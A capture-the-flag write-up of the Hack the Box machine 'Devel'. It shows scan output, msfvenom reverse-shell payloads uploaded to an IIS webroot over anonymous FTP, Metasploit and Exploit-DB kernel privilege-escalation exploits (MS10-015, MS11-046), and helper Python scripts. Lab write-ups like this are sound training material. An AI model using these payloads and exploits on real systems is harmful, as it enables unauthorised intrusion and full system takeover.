Hack the Box Devel

Arcy Caparros
9 min read · Jul 23, 2020

My write-up on HTB’s retired machine “Devel” that outlines Metasploit usage and manual exploitation.

Disclaimer

This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

Reconnaissance

First, let's use nmapAutomator to automate the recon/enumeration phase.

Summary of our nmap scan results:

---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 20:52 EDT
Nmap scan report for 10.10.10.5
Host is up (0.020s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.05 seconds


Running Vuln scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 20:52 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.5
Host is up (0.023s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
80/tcp open http Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2015-1635:
| VULNERABLE:
| Remote Code Execution in HTTP.sys (MS15-034)
| State: VULNERABLE
| IDs: CVE:CVE-2015-1635
| A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is
| caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who
| successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
|
| Disclosure date: 2015-04-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.97 seconds

Further enumeration

Manually checking port tcp/80. The vuln scan's MS15-034 (HTTP.sys) hit is plausible for an unpatched Windows 7 build, but the public exploit code for that bug only crashes the host (denial of service), so we set it aside and look for a quieter foothold.

root@cainta:~/Documents/htb/Devel# nikto -h http://10.10.10.5/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.5
+ Target Hostname: 10.10.10.5
+ Target Port: 80
+ Start Time: 2020-06-05 21:39:48 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ /: Appears to be a default IIS 7 install.
+ 7863 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2020-06-05 21:44:11 (GMT-4) (263 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@cainta:~/Documents/htb/Devel#

Executed Gobuster as well:

root@cainta:~/Documents/htb/Devel# gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.aspx,.asp -u http://10.10.10.5/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.5/
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,aspx,asp
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/06/05 21:51:20 Starting gobuster
===============================================================
http://10.10.10.5/aspnet_client (Status: 301) [Size: 155]
===============================================================
2020/06/05 21:52:08 Finished
===============================================================

FTP Service

Let's see whether we can upload a file over FTP and, if that directory is served by IIS, get a reverse shell. First we create an .aspx reverse shell with msfvenom. Since we are covering both Metasploit and manual exploitation, we'll create the Meterpreter payload first.

root@cainta:~/Documents/htb/Devel# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -f aspx LHOST=10.10.14.6 LPORT=4444 -o reverse-shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of aspx file: 2984 bytes
Saved as: reverse-shell.aspx

Upload reverse-shell.aspx via FTP

root@cainta:~/Documents/htb/Devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put reverse-shell.aspx
local: reverse-shell.aspx remote: reverse-shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2906 bytes sent in 0.00 secs (15.7465 MB/s)
ftp>

Load Metasploit, select exploit/multi/handler with the same payload and LHOST/LPORT as the msfvenom command, and listen on port 4444:

msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.6       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) >

With the handler running, trigger the payload by requesting the uploaded file over HTTP: http://10.10.10.5/reverse-shell.aspx. The anonymous FTP root is the IIS webroot (C:\inetpub\wwwroot), so anything we put there is served, and an .aspx file is compiled and executed by ASP.NET.
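Before dropping a payload it is worth confirming that the anonymous FTP root really is the directory IIS serves. The following Python script is an added example for this write-up, not code from the original post or from any tool it uses. It uploads a random marker in binary mode, checks the size the server reports (which catches ASCII-mode corruption, the same thing that would break an uploaded .exe), fetches the marker over HTTP, compares the bytes, and cleans up. The host and URL constants are assumptions matching the lab addresses used here; the upload/fetch/delete callables are injectable so the logic can be exercised without a live target.

```python
"""Confirm that the anonymous FTP root is the directory IIS serves.

Added example for this write-up; not part of the original post or of any
tool it uses. Host/URL constants are assumptions matching the lab addresses.
"""
import ftplib
import io
import secrets
import urllib.request

FTP_HOST = "10.10.10.5"            # assumed lab target
HTTP_BASE = "http://10.10.10.5/"   # assumed lab target


def ftp_upload(host, name, data):
    """Anonymous, binary-mode upload. Returns the size the server reports
    for the stored file (None if the server does not support SIZE)."""
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login()                                   # anonymous / blank password
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))
        try:
            return ftp.size(name)
        except ftplib.error_perm:
            return None


def ftp_delete(host, name):
    """Best-effort cleanup of the marker file."""
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login()
        ftp.delete(name)


def http_get(url):
    """Plain GET; raises on HTTP errors such as 404."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read()


def ftp_root_is_webroot(ftp_host=FTP_HOST, http_base=HTTP_BASE,
                        upload=ftp_upload, fetch=http_get, delete=ftp_delete):
    """Upload a random marker over FTP, fetch it over HTTP, and compare.

    Returns (mapped, reason). mapped is True only when the exact bytes come
    back, which is the condition under which an uploaded .aspx will run.
    The upload/fetch/delete callables are injectable for offline testing.
    """
    marker = secrets.token_hex(16).encode()
    name = f"probe-{secrets.token_hex(4)}.txt"
    try:
        reported = upload(ftp_host, name, marker)
        if reported is not None and reported != len(marker):
            # ASCII-mode or otherwise lossy transfer: a binary such as an .exe
            # uploaded this way would be corrupted, so flag it explicitly.
            return False, f"size mismatch ({reported} != {len(marker)}): transfer not binary-clean"
        try:
            body = fetch(http_base + name)
        except Exception as exc:             # 404 means the FTP root is not the webroot
            return False, f"HTTP fetch failed: {exc}"
        if body == marker:
            return True, "marker served by the web server"
        return False, "different content served"
    finally:
        try:
            delete(ftp_host, name)           # anonymous may lack delete rights
        except Exception:
            pass


if __name__ == "__main__":
    print(ftp_root_is_webroot())
```

A True result means the FTP share and the webroot are the same directory and a payload in a server-executed extension (.aspx on IIS) will run when requested; a size mismatch means the client is transferring in ASCII mode, which is harmless for this text marker but would corrupt the MS11-046.exe upload later in this write-up.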

Initial Foothold

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.5:49158) at 2020-07-21 07:48:47 -0400
meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

We have a low-privilege shell as the application pool identity IIS APPPOOL\Web. Meterpreter's built-in getsystem techniques all fail, so we need another route to elevate.

User flag obtained

C:\Users\babis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of C:\Users\babis\Desktop

18/03/2017  02:14    <DIR>          .
18/03/2017  02:14    <DIR>          ..
18/03/2017  02:18                32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.454.733.824 bytes free

We ran Metasploit's local exploit suggester (post/multi/recon/local_exploit_suggester) against the session and picked exploit/windows/local/ms10_015_kitrap0d (MS10-015, KiTrap0d), which fits this unpatched 32-bit Windows 7 build:

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.6:5555
[*] Launching notepad to host the exploit...
[+] Process 3388 launched.
[*] Reflectively injecting the exploit DLL into 3388...
[*] Injecting exploit into 3388 ...
[*] Exploit injected. Injecting payload into 3388...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.6:5555 -> 10.10.10.5:49158) at 2020-07-21 08:03:00 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Root flag obtained

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of C:\Users\Administrator\Desktop

18/03/2017  02:17    <DIR>          .
18/03/2017  02:17    <DIR>          ..
18/03/2017  02:17                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.455.270.400 bytes free
C:\Users\Administrator\Desktop>

Manual exploitation without the use of Metasploit (msfvenom is still used to build the payload)

Create payload using msfvenom

root@cainta:~/Documents/htb/Devel# msfvenom -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -f aspx LHOST=10.10.14.6 LPORT=4444 -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of aspx file: 2927 bytes
Saved as: shell.aspx

Use FTP service to upload file

root@cainta:~/Documents/htb/Devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
07-24-20 10:44PM 2984 reverse-shell.aspx
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2964 bytes sent in 0.00 secs (28.2669 MB/s)
ftp>

Once the upload completes, set up a netcat listener on port 4444 and request http://10.10.10.5/shell.aspx to trigger the payload. Note that windows/shell/reverse_tcp is a staged payload: the stager expects a Metasploit handler to send it the second stage, so with a plain netcat listener the stageless windows/shell_reverse_tcp is the dependable choice.

Our initial access is very limited; the IIS APPPOOL\Web identity cannot even read the user profile folders.

Elevating our privilege

We ran windows-exploit-suggester.py against the systeminfo output. In its results, [M] marks bulletins that have a Metasploit module and [E] those that have a public (Exploit-DB) exploit:

System Information:

c:\inetpub\wwwroot>systeminfo
systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31
System Boot Time: 26/7/2020, 11:46:11
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 701 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.521 MB
Virtual Memory: In Use: 526 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5

Possible exploits:

[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
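To make the suggester's logic concrete, here is a Python sketch of what windows-exploit-suggester.py does. It is an added example for this write-up, not the tool's own code: it parses systeminfo text (the sample is constructed from the output above), derives the NT version, architecture and installed KBs, and lists the bulletins whose fix is missing. The bulletin table is a deliberately small illustration: the KB numbers for MS10-015, MS10-059, MS11-011 and MS13-005 are the ones printed in parentheses in the suggester output, KB2503665 is Microsoft's number for MS11-046, and the version/architecture scoping is simplified.

```python
"""What windows-exploit-suggester.py does, in miniature.

Added example, not the tool itself and not code from the write-up: parse the
text of systeminfo, then list bulletins whose fixing KB is not installed for
this NT version and architecture. The bulletin table is deliberately tiny.
"""
import re

# Constructed sample, trimmed from the systeminfo output shown in this write-up.
SAMPLE_SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# (bulletin, KB that fixes it, NT versions it applies to, arch restriction or None).
# KBs for MS10-015, MS10-059, MS11-011 and MS13-005 are the ones printed in the
# suggester output above; KB2503665 is Microsoft's number for MS11-046.
# Version/arch scoping is simplified for illustration (assumption).
BULLETINS = [
    ("MS10-015", "KB977165",  {"6.0", "6.1"}, {"x86"}),  # KiTrap0d: 32-bit kernels only
    ("MS10-059", "KB982799",  {"6.0", "6.1"}, None),     # tracing feature for services
    ("MS11-011", "KB2393802", {"6.0", "6.1"}, None),     # kernel EoP
    ("MS11-046", "KB2503665", {"6.0", "6.1"}, None),     # afd.sys; EDB 40564 targets x86
    ("MS13-005", "KB2778930", {"6.0", "6.1"}, None),     # win32k EoP
]

FIELD_RE = re.compile(r"^([A-Za-z0-9()/ ]+?):\s*(.*)$")
KB_RE = re.compile(r"\bKB\d{6,7}\b", re.IGNORECASE)


def parse_systeminfo(text):
    """Extract NT version, build, architecture and installed KBs from systeminfo text."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)          # continuation lines ("[01]: ...") do not match
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    ver = re.search(r"(\d+\.\d+)\.(\d+)", fields.get("OS Version", ""))
    arch = "x86" if fields.get("System Type", "").lower().startswith("x86") else "x64"
    return {
        "nt": ver.group(1) if ver else None,
        "build": int(ver.group(2)) if ver else None,
        "arch": arch,
        # "Hotfix(s): N/A" simply yields no KB lines, i.e. nothing installed.
        "hotfixes": {kb.upper() for kb in KB_RE.findall(text)},
    }


def suggest(info, bulletins=BULLETINS):
    """Bulletins that apply to this NT version/arch and whose fix is absent."""
    return [
        bulletin
        for bulletin, kb, versions, archs in bulletins
        if info["nt"] in versions
        and (archs is None or info["arch"] in archs)
        and kb not in info["hotfixes"]
    ]


if __name__ == "__main__":
    print(suggest(parse_systeminfo(SAMPLE_SYSTEMINFO)))
```

On the sample above every entry comes back, because Hotfix(s) is N/A and the box is 32-bit; add a KB line or switch System Type to x64 and the corresponding entries drop out. The real tool works the same way over Microsoft's full bulletin spreadsheet, which is also why it flags bulletins that have no working exploit for a given build.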

Tried several exploits based on the suggester's results without success; the one that worked is MS11-046 (afd.sys local privilege escalation, Exploit-DB 40564), which the suggester did not list:

root@cainta:~/Documents/htb/Devel# searchsploit 40564
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------- ---------------------------------
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-0 | windows_x86/local/40564.c
----------------------------------------------------------------------- ---------------------------------

Copy it out with searchsploit -m 40564, rename it MS11-046.c, and compile it as per the notes in the exploit's header:

Exploit compiling (Kali GNU/Linux Rolling 64-bit):
  i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32

Once compiled, find a way to upload 'MS11-046.exe'. I used the FTP service to upload our exploit and executed it. Switch the FTP client to binary mode (the binary command) before the put, otherwise an ASCII-mode transfer corrupts the executable.

Upload MS11-046.exe and run it from the low-privilege shell:

c:\inetpub\wwwroot>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\inetpub\wwwroot

26/07/2020  01:51    <DIR>          .
26/07/2020  01:51    <DIR>          ..
18/03/2017  02:06    <DIR>          aspnet_client
17/03/2017  05:37               689 iisstart.htm
26/07/2020  01:51           299.312 MS11-046.exe
26/07/2020  01:10             2.871 shell.aspx
17/03/2017  05:37           184.946 welcome.png
               4 File(s)        487.818 bytes
               3 Dir(s)  24.607.924.224 bytes free

c:\inetpub\wwwroot>MS11-046.exe
MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>

Both user and root flags obtained

c:\Windows\System32>dir C:\users\administrator\desktop
dir C:\users\administrator\desktop
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of C:\users\administrator\desktop

18/03/2017  02:17    <DIR>          .
18/03/2017  02:17    <DIR>          ..
18/03/2017  02:17                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.611.110.912 bytes free

c:\Windows\System32>dir C:\users\babis\desktop
dir C:\users\babis\desktop
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of C:\users\babis\desktop

18/03/2017  02:14    <DIR>          .
18/03/2017  02:14    <DIR>          ..
18/03/2017  02:18                32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.611.110.912 bytes free

c:\Windows\System32>

Lessons Learned

  • Use of other tools for Windows privilege escalation, such as windows-exploit-suggester.py and WinPEAS.
  • Suggested exploits do not always work, so researching other kernel exploits for the exact build (here MS11-046, which the suggester did not list) is also necessary.
